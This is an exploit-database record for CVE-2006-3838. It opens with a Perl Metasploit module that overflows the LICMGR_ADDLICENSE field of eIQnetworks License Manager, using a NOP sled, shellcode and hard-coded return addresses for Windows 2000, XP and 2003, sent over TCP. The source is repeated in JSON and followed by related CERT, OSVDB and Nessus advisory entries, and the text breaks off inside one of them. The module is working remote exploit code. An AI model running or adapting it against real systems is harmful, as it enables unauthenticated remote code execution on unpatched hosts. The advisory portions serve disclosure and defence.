ID EDB-ID:2074 Type exploitdb Reporter ri0t Modified 2006-07-26T00:00:00
Description
eIQnetworks License Manager Remote Buffer Overflow Exploit (1262). CVE-2006-3838. Remote exploit for windows platform
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_1262;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 1262,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
in size. This module should work on all rebranded eiq analysers. Exploitation
assistance from KF of digital munition.
}),
'DefaultTarget' => 1,
'Targets' =>
[
['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx
['Windows XP English SP1/SP2', 0x77db64dc ], # jmp ebx
['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx
],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $nops = $self->MakeNops(1262 - length($shellcode));
my $ret = pack("V", $target->[1]);
my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
$s->Send("$evil");
return;
}
# milw0rm.com [2006-07-26]
{"bulletinFamily": "exploit", "id": "EDB-ID:2074", "cvelist": ["CVE-2006-3838"], "modified": "2006-07-26T00:00:00", "lastseen": "2016-01-31T15:28:13", "edition": 1, "sourceData": "#!/usr/bin/perl -w\n\n#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs\n\npackage Msf::Exploit::EiQ_License_1262; \nuse base \"Msf::Exploit\";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\t'Name' => 'EIQ License Manager Overflow',\n\t'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],\n\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t\n\t'AutoOpts' => { 'EXITFUNC' => 'seh' },\n\t\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 10616],\n\t },\n 'Payload' =>\n\t {\n\t\t'Space' => 1262,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x40\\x26\",\n },\n 'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits the buffer overflow found in the LICMGR_ADDLICENSE\n Field of EIQ networks network analyser this module exploits buffers of 1262 bytes\n\tin size. This module should work on all rebranded eiq analysers. Exploitation\n\tassistance from KF of digital munition.\n }),\n \n \n 'DefaultTarget' => 1,\n\t'Targets' =>\n\t [\n\t ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx\n\t\t['Windows XP English SP1/SP2', 0x77db64dc ],\t# jmp ebx\n\t ['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx\n\t ],\n \n };\n \n sub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n \n sub Exploit {\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n my $nops \t= $self->MakeNops(1262 - length($shellcode));\n my $ret = pack(\"V\", $target->[1]);\n my $evil = \"LICMGR_ADDLICENSE&\" . $nops . $shellcode . $ret . \"&\";\n\t\n \n my $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n \t );\n \n if ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n $self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using return address 0x%.8x....\", $target->[1]));\n \n $s->Send(\"$evil\");\n return;\n }\n\n# milw0rm.com [2006-07-26]\n", "published": "2006-07-26T00:00:00", "href": "https://www.exploit-db.com/exploits/2074/", "osvdbidlist": ["27526"], "reporter": "ri0t", "hash": "453777bb9bfa9bd720a5b580da844bd86a2b50a174e7e1453e427e9cbae57db8", "title": "eIQnetworks License Manager Remote Buffer Overflow Exploit 1262", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "eIQnetworks License Manager Remote Buffer Overflow Exploit (1262). CVE-2006-3838. Remote exploit for windows platform", "references": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2074/", "enchantments": {"vulnersScore": 7.2}}
{"result": {"cve": [{"id": "CVE-2006-3838", "type": "cve", "title": "CVE-2006-3838", "description": "Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).", "published": "2006-07-26T21:04:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-07-20T10:49:26"}], "cert": [{"id": "VU:513068", "type": "cert", "title": "eIQnetworks Enterprise Security Analyzer Syslog server buffer overflow", "description": "### Overview\n\nThe eIQnetworks Enterprise Security Analyzer Syslog server contains a buffer overflow vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Enterprise Security Analyzer**\n\neIQnetworks [Enterprise Security Analyzer](<http://www.eiqnetworks.com/products/EnterpriseSecurityAnalyzer.shtml>) (ESA) \"`... pro``vides essential real-time security intelligence to help decipher hacker/virus behavior, combat security threats and meet regulatory compliance requirements across the entire IT infrastructure \u2013 network devices and hosts.`\" ESA is also provided on an OEM basis as Astaro Report Manager, Fortinet FortiReporter, iPolicy Security Reporter, SanMina Viking Multi-Log Manager, Secure Computing G2 Security Reporter, and Top Layer Network Security Analyzer. \n \n**ESA Syslog server** \n \nThe ESA Syslog server is provided by the `SyslogServer.exe` executable. This server collects data from managed machines and listens on `10617/tcp`. \n \n**The problem** \n \nThe ESA Syslog server contains a buffer overflow vulnerability. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a system running the vulnerable Syslog component. \n \n--- \n \n### Solution\n\n**Apply an update** \nThis vulnerability is addressed in eIQnetworks [ESA 2.5.0](<http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf>). \n \nOEM versions of ESA, including Astaro Report Manager, Fortinet FortiReporter, iPolicy Security Reporter, SanMina Viking Multi-Log Manager, Secure Computing G2 Security Reporter, and Top Layer Network Security Analyzer should be updated to version 4.5.4 or later. \n \n--- \n \n \n**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by eIQnetworks ESA Syslog server (typically `10617/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nAstaro| | -| 01 Aug 2006 \neIQnetworks| | -| 01 Aug 2006 \nFortinet, Inc.| | 01 Aug 2006| 01 Aug 2006 \nSecure Computing Network Security Division| | 01 Aug 2006| 01 Aug 2006 \nTop Layer Networks, Inc.| | 01 Aug 2006| 01 Aug 2006 \nViking InterWorks| | -| 01 Aug 2006 \niPolicy Networks| | -| 16 Aug 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23513068 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.eiqnetworks.com/support/Security_Advisory.pdf>\n * <http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf>\n * <http://www.zerodayinitiative.com/advisories/TSRT-06-03.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-023.html>\n * <http://secunia.com/advisories/21211/>\n * <http://secunia.com/advisories/21213/>\n * <http://secunia.com/advisories/21214/>\n * <http://secunia.com/advisories/21215/>\n * <http://secunia.com/advisories/21217/>\n * <http://www.auscert.org.au/6544>\n\n### Credit\n\nThis vulnerability was disclosed by TippingPoint, who in turn credit Cody Pierce.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-3838](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838>)\n * Date Public: 26 Jul 2006\n * Date First Published: 18 Jan 2007\n * Date Last Updated: 18 Jan 2007\n * Severity Metric: 34.79\n * Document Revision: 13\n\n", "published": "2007-01-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/513068", "cvelist": ["CVE-2006-3838", "CVE-2006-3838"], "lastseen": "2016-02-03T09:12:24"}], "packetstorm": [{"id": "PACKETSTORM:48651", "type": "packetstorm", "title": "eIQ-ESA.txt", "description": "", "published": "2006-07-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/48651/eIQ-ESA.txt.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:13:14"}, {"id": "PACKETSTORM:48650", "type": "packetstorm", "title": "eIQ-LM-3.txt", "description": "", "published": "2006-07-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/48650/eIQ-LM-3.txt.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:14:46"}, {"id": "PACKETSTORM:83050", "type": "packetstorm", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83050/eIQNetworks-ESA-License-Manager-LICMGR_ADDLICENSE-Overflow.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:20:12"}, {"id": "PACKETSTORM:83079", "type": "packetstorm", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83079/eIQNetworks-ESA-Topology-DELETEDEVICE-Overflow.html", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-12-05T22:25:20"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/MISC/EIQNETWORKS_ESA", "type": "metasploit", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.", "published": "2006-09-12T05:46:42", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2006-3838"], "lastseen": "2018-01-14T02:07:13"}, {"id": "MSF:EXPLOIT/WINDOWS/MISC/EIQNETWORKS_ESA_TOPOLOGY", "type": "metasploit", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.", "published": "2006-09-12T05:46:42", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2006-3838"], "lastseen": "2018-02-05T18:17:28"}], "nessus": [{"id": "ESA_SYSLOG_CMD_ARGUMENT_OVERFLOWS.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer Syslog Server Multiple Remote Overflows", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host is affected by multiple stack-based buffer overflows in its Syslog Service. Using a long argument to any of several commands, an unauthenticated, remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22127", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-02-24T01:01:13"}, {"id": "ESA_LICMGR_ADDLICENSES_OVERFLOW.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Overflow", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host contains a buffer overflow in its License Manager service. Using a long argument to the 'LICMGR_ADDLICENSE' command, an unauthenticated remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22129", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-09-26T17:26:34"}, {"id": "ESA_MONITORING_CMD_ARG_OVERFLOWS.NASL", "type": "nessus", "title": "eIQnetworks Enterprise Security Analyzer Monitoring.exe Multiple Command Overflow", "description": "The version of eIQnetworks Enterprise Security Analyzer, Network Security Analyzer, or one of its OEM versions installed on the remote host contains a buffer overflow in its Monitoring Agent service. Using a long argument to a command, an unauthenticated, remote attacker may be able to leverage this issue to execute arbitrary code on the affected host with LOCAL SYSTEM privileges.", "published": "2006-08-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22196", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-02-24T01:03:36"}], "exploitdb": [{"id": "EDB-ID:16451", "type": "exploitdb", "title": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow", "description": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow. CVE-2006-3838. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16451/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-02-01T23:53:56"}, {"id": "EDB-ID:16438", "type": "exploitdb", "title": "eIQNetworks ESA Topology DELETEDEVICE Overflow", "description": "eIQNetworks ESA Topology DELETEDEVICE Overflow. CVE-2006-3838. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16438/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-02-01T23:52:06"}, {"id": "EDB-ID:2140", "type": "exploitdb", "title": "eIQnetworks License Manager Remote Buffer Overflow Exploit multi", "description": "eIQnetworks License Manager Remote Buffer Overflow Exploit (multi). CVE-2006-3838. Remote exploit for windows platform", "published": "2006-08-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/2140/", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-01-31T15:36:36"}], "osvdb": [{"id": "OSVDB:27525", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer syslogserver.exe Pre-authentication Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-023.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0603.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: ZDI-06-023\nKeyword: \n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27525", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27529", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer Monitoring.exe Unspecified Issue", "description": "## Vulnerability Description\nAn unspecified remote vulnerability exists in eIQnetworks Enterprise Security Analyzer Monitoring.exe. With a specially crafted request sent to port TCP 9999, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAn unspecified remote vulnerability exists in eIQnetworks Enterprise Security Analyzer Monitoring.exe. With a specially crafted request sent to port TCP 9999, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TCP Port 9999\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27529", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27526", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE Command Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The license manager daemon (EnterpriseSecurityAnalyzer.exe) fails to perform proper bounds checking on the LICMGR_ADDLICENSE commands resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The license manager daemon (EnterpriseSecurityAnalyzer.exe) fails to perform proper bounds checking on the LICMGR_ADDLICENSE commands resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0602.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TCP port 10616\nKeyword: ZDI-06-024\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27526", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27527", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer syslogserver.exe Multiple Command Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on various commands passed through TCP port 10617, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on various commands passed through TCP port 10617, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\n[Related OSVDB ID: 27528](https://vulners.com/osvdb/OSVDB:27528)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/TSRT-06-03.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0605.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nKeyword: TSRT-06-03\nKeyword: TCP port 10617\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27527", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}, {"id": "OSVDB:27528", "type": "osvdb", "title": "eIQnetworks Enterprise Security Analyzer Topology.exe Pre-authentication Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. Topology.exe fails to perform proper bounds checking on the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE commands passed to TCP port 10628 resulting in a stack based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution 